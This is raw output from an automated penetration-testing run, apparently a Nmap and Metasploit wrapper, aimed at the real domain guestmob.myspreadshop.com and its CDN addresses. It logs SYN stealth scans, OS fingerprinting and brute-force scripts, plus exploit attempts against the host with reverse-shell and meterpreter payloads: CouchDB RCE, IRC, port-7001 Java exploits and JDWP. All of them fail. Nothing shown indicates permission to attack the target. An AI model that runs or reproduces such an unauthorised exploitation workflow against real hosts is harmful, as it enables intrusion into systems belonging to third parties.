[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.2.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 151.101.66.137
[-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer
[-] Call stack:
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'
[-]   /usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:578:in `block in read_response'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
[-]   /usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:567:in `read_response'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:233:in `_send_recv'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:208:in `send_recv'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:430:in `send_request_cgi'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:102:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:200::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:400::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42:600::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Running module against 2a04:4e42::649
[-] Auxiliary failed: NoMethodError undefined method `body' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:107:in `get_dbs'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/couchdb/couchdb_enum.rb:225:in `run'
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](15:36)x•
 RUNNING APACHE COUCHDB RCE EXPLOIT 
====================================================================================•x[2022-02-21](15:36)x•
[*] Using configured payload linux/x64/shell_reverse_tcp
RHOSTS => guestmob.myspreadshop.com
RPORT => 5984
LHOST => 127.0.0.1
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

[*] Exploiting target 151.101.194.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.2.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.66.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 151.101.130.137
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 2a04:4e42:200::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42:400::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42:600::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploiting target 2a04:4e42::649
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
[*] Exploit completed, but no session was created.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 opened... running tests...
====================================================================================•x[2022-02-21](15:37)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:37)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:37 EST
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating NSE at 15:37
Completed NSE at 15:37, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:37
Completed Parallel DNS resolution of 1 host. at 15:37, 0.08s elapsed
Initiating SYN Stealth Scan at 15:37
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 6667/tcp on 151.101.2.137
Completed SYN Stealth Scan at 15:37, 0.13s elapsed (1 total ports)
Initiating Service scan at 15:37
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 15:40, 168.38s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 15:40
Completed Traceroute at 15:40, 0.11s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 0.06s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 15:40
Completed NSE at 15:41, 30.66s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 1.74s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.083s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT     STATE SERVICE VERSION
6667/tcp open  irc?
|_irc-sasl-brute: ERROR: Script execution failed (use -d to debug)
|_irc-brute: ERROR: Script execution failed (use -d to debug)
|_irc-info: Unable to open connection
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.879 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 6667/tcp)
HOP RTT       ADDRESS
1   102.12 ms 151.101.2.137

NSE: Script Post-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.53 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 36 (2.284KB)
====================================================================================•x[2022-02-21](15:41)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:41)x•
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.194.137
[-] 151.101.194.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.2.137
[-] 151.101.2.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.66.137
[-] 151.101.66.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 151.101.130.137
[-] 151.101.130.137:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42::649
[-] 2a04:4e42::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:200::649
[-] 2a04:4e42:200::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:400::649
[-] 2a04:4e42:400::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploiting target 2a04:4e42:600::649
[-] 2a04:4e42:600::649:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
 + -- --=[Port 7001 opened... running tests...
====================================================================================•x[2022-02-21](15:41)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:41)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:41 EST
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating Ping Scan at 15:41
Scanning guestmob.myspreadshop.com (151.101.66.137) [4 ports]
Completed Ping Scan at 15:41, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 0.07s elapsed
Initiating SYN Stealth Scan at 15:41
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 7001/tcp on 151.101.66.137
Completed SYN Stealth Scan at 15:41, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:41
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 15:44, 158.60s elapsed (1 service on 1 host)
NSE: Script scanning 151.101.66.137.
Initiating NSE at 15:44
Completed NSE at 15:44, 7.23s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 1.48s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649

PORT     STATE SERVICE        VERSION
7001/tcp open  afs3-callback?

NSE: Script Post-scanning.
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.29 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
====================================================================================•x[2022-02-21](15:44)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:44)x•
[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[*] Exploit completed, but no session was created.
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
RHOST => guestmob.myspreadshop.com
RHOSTS => guestmob.myspreadshop.com
RPORT => 7001
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.194.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.194.137:7001) timed out.
[!] 151.101.194.137:7001 - This exploit may require manual cleanup of '/tmp/OldyIJz.jar' on the target
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.2.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.2.137:7001) timed out.
[!] 151.101.2.137:7001 - This exploit may require manual cleanup of '/tmp/UURlSZ.jar' on the target
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.66.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.66.137:7001) timed out.
[!] 151.101.66.137:7001 - This exploit may require manual cleanup of '/tmp/mpzx.jar' on the target
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.130.137:7001 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (151.101.130.137:7001) timed out.
[!] 151.101.130.137:7001 - This exploit may require manual cleanup of '/tmp/GejD.jar' on the target
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:200::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:7001) was unreachable.
[!] 2a04:4e42:200::649:7001 - This exploit may require manual cleanup of '/tmp/LYxpD.jar' on the target
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:400::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:7001) was unreachable.
[!] 2a04:4e42:400::649:7001 - This exploit may require manual cleanup of '/tmp/CGOC.jar' on the target
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:600::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:7001) was unreachable.
[!] 2a04:4e42:600::649:7001 - This exploit may require manual cleanup of '/tmp/KbGlwn.jar' on the target
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42::649:7001 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:7001) was unreachable.
[!] 2a04:4e42::649:7001 - This exploit may require manual cleanup of '/tmp/UfDIP.jar' on the target
[*] Exploit completed, but no session was created.
 + -- --=[Port 8000 opened... running tests...
====================================================================================•x[2022-02-21](15:46)x•
 RUNNING JAVA JDWP DEBUG EXPLOIT 
====================================================================================•x[2022-02-21](15:46)x•
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
RHOSTS => guestmob.myspreadshop.com
RPORT => 8000
SSL => false
LHOST => 127.0.0.1
LPORT => 4444
[*] Exploiting target 151.101.130.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.130.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.194.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.194.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.2.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.2.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 151.101.66.137
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 151.101.66.137:8000 - Exploit aborted due to failure: not-vulnerable: JDWP Protocol not found
[*] Exploiting target 2a04:4e42:200::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:200::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:200::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42:400::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:400::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:400::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42:600::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42:600::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42:600::649]:8000) was unreachable.
[*] Exploiting target 2a04:4e42::649
[*] Started reverse TCP handler on 10.83.0.8:4444 
[-] 2a04:4e42::649:8000 - Exploit failed [unreachable]: Rex::HostUnreachable The host ([2a04:4e42::649]:8000) was unreachable.
[*] Exploit completed, but no session was created.
 + -- --=[Port 8001 opened... running tests...
 ====================================================================================•x[2022-02-21](15:47)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2022-02-21](15:47)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:47 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:47
Completed Parallel DNS resolution of 1 host. at 15:47, 0.22s elapsed
Initiating SYN Stealth Scan at 15:47
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 8001/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:47, 0.10s elapsed (1 total ports)
Initiating Service scan at 15:47
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:50, 158.95s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:50
Completed Traceroute at 15:50, 0.17s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:50
Completed Parallel DNS resolution of 1 host. at 15:50, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:50
Completed NSE at 15:50, 0.01s elapsed
Initiating NSE at 15:50
Completed NSE at 15:50, 1.10s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.14s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649

PORT     STATE SERVICE      VERSION
8001/tcp open  vcom-tunnel?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.534 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 8001/tcp)
HOP RTT       ADDRESS
1   166.55 ms 151.101.130.137

NSE: Script Post-scanning.
Initiating NSE at 15:50
Completed NSE at 15:50, 0.00s elapsed
Initiating NSE at 15:50
Completed NSE at 15:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.14 seconds
           Raw packets sent: 67 (6.368KB) | Rcvd: 41 (2.683KB)
====================================================================================•x[2022-02-21](15:50)x•
 RUNNING METASPLOIT MODULES 
====================================================================================•x[2022-02-21](15:50)x•
RHOST => guestmob.myspreadshop.com
RPORT => 8001
[*] Running module against 151.101.2.137
[*] 151.101.2.137:8001 - Sending RMI Header...
[-] 151.101.2.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.66.137
[*] 151.101.66.137:8001 - Sending RMI Header...
[-] 151.101.66.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.130.137
[*] 151.101.130.137:8001 - Sending RMI Header...
[-] 151.101.130.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 151.101.194.137
[*] 151.101.194.137:8001 - Sending RMI Header...
[-] 151.101.194.137:8001 - Failed to negotiate RMI protocol
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:8001 - Sending RMI Header...
[-] 2a04:4e42:400::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:8001) was unreachable.
[-] 2a04:4e42:400::649:8001 - Call stack:
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:8001 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:8001 - Sending RMI Header...
[-] 2a04:4e42:600::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:8001) was unreachable.
[-] 2a04:4e42:600::649:8001 - Call stack:
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:8001 -   /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:8001 - Sending RMI Header...
[-] 2a04:4e42::649:8001 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:8001) was unreachable.
[-] 2a04:4e42::649:8001 - Call stack:
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:8001 -   /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
